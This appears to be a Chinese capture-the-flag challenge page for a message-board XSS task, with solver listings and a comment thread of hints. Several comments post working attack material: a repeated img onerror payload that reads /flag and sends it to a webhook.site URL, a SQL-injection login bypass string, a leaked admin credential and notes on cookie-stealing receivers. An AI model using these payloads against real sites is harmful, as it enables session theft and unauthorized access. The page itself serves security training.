留言板WEB 未解决
分数:
10
金币:
3
题目作者:
harry
一 血:
꧁༺༽༾ཊ彪ཏ༿༼༻꧂
一血奖励:
5金币
解 决:
3420
提 示:
题目无需登录后台!需要xss平台接收flag
描 述:
http协议需要http协议的xss平台
评分(19)
解题动态
cenyo 攻破了该题 2小时前
billy856 攻破了该题 1天前
fi1y 攻破了该题 4天前
imhacker 攻破了该题 4天前
曦羽 攻破了该题 5天前
等往事风中吹‘ 攻破了该题 6天前
dwx386572657 攻破了该题 7天前
luobosir 攻破了该题 7天前
WW12@ 攻破了该题 8天前
ChatFaro 攻破了该题 8天前
1546546 攻破了该题 9天前
一世温华 攻破了该题 11天前
hull-p 攻破了该题 14天前
凯哥 攻破了该题 15天前
lvchijing 攻破了该题 15天前
baizhi白栀 攻破了该题 16天前
星落. 攻破了该题 17天前
13822005976 攻破了该题 17天前
heting 攻破了该题 21天前
评论
song..22 1月前
举报
<img src=x onerror="fetch('/flag').then(r=>r.text()).then(d=>fetch('http://webhook.site/59ef6d33-3e0e-4a78-82f8-f38d98eff154?flag='+encodeURIComponent(d)))">
song..22 1月前
举报
<img src=x onerror="fetch('/flag').then(r=>r.text()).then(d=>fetch('http://webhook.site/59ef6d33-3e0e-4a78-82f8-f38d98eff154?flag='+encodeURIComponent(d)))">
song..22 1月前
举报
<img src=x onerror="fetch('/flag').then(r=>r.text()).then(d=>fetch('http://webhook.site/59ef6d33-3e0e-4a78-82f8-f38d98eff154?flag='+encodeURIComponent(d)))">
Gcysnd 2月前
举报
挺容易,挖到admin后台/admin.php用1' or '1' = '1' --万能用户名登录后发现存在html注入点,于是聊天室发送<script>alert(cookie)</scirpt>找到flag
xxsko 2月前
举报
万能用户名你可以?我用你这个也不行1' or '1' = '1' --万能用户名
2333m 2月前
举报
触发xss需要登录后台/admin.php, admin/011be4d65feac1a8 (通过翻评论区找到的,据说是dirsearch跑出来admin.php和db.sql,但是我没找到)
YS_JW 3月前
举报
我在img图片位置直接插入http://{ceye平台}/?cookie='+document.cookie+',ceye那边有回显,但是cookie没有被带出来,直接以?cookie=\%27+document.cookie+\%27形式返回了,去掉'后也是直接以document.cookie字符返回,这是为啥哦,问ai也没问出来原因
BLX123 6月前
举报
想用python的h(ttp)协议来接收xss,自身得是一个公网IP反弹才能定位到自己
网恋秀牛子被录屏导致自卑 6月前
举报
ceye,xsspt,xss.aq要么收不到要么收费,我用的是xss.report,可以收到,payload很多,界面酷炫,点右边的爬虫图标就能看到详情,cookie里面有flag
igrazee 7月前
举报
flag{*******}
TTxyz 9月前
举报
啥题啊?不登陆怎么回显的???还有那个db.sql扫不出来啊,我直接访问也是无法连接???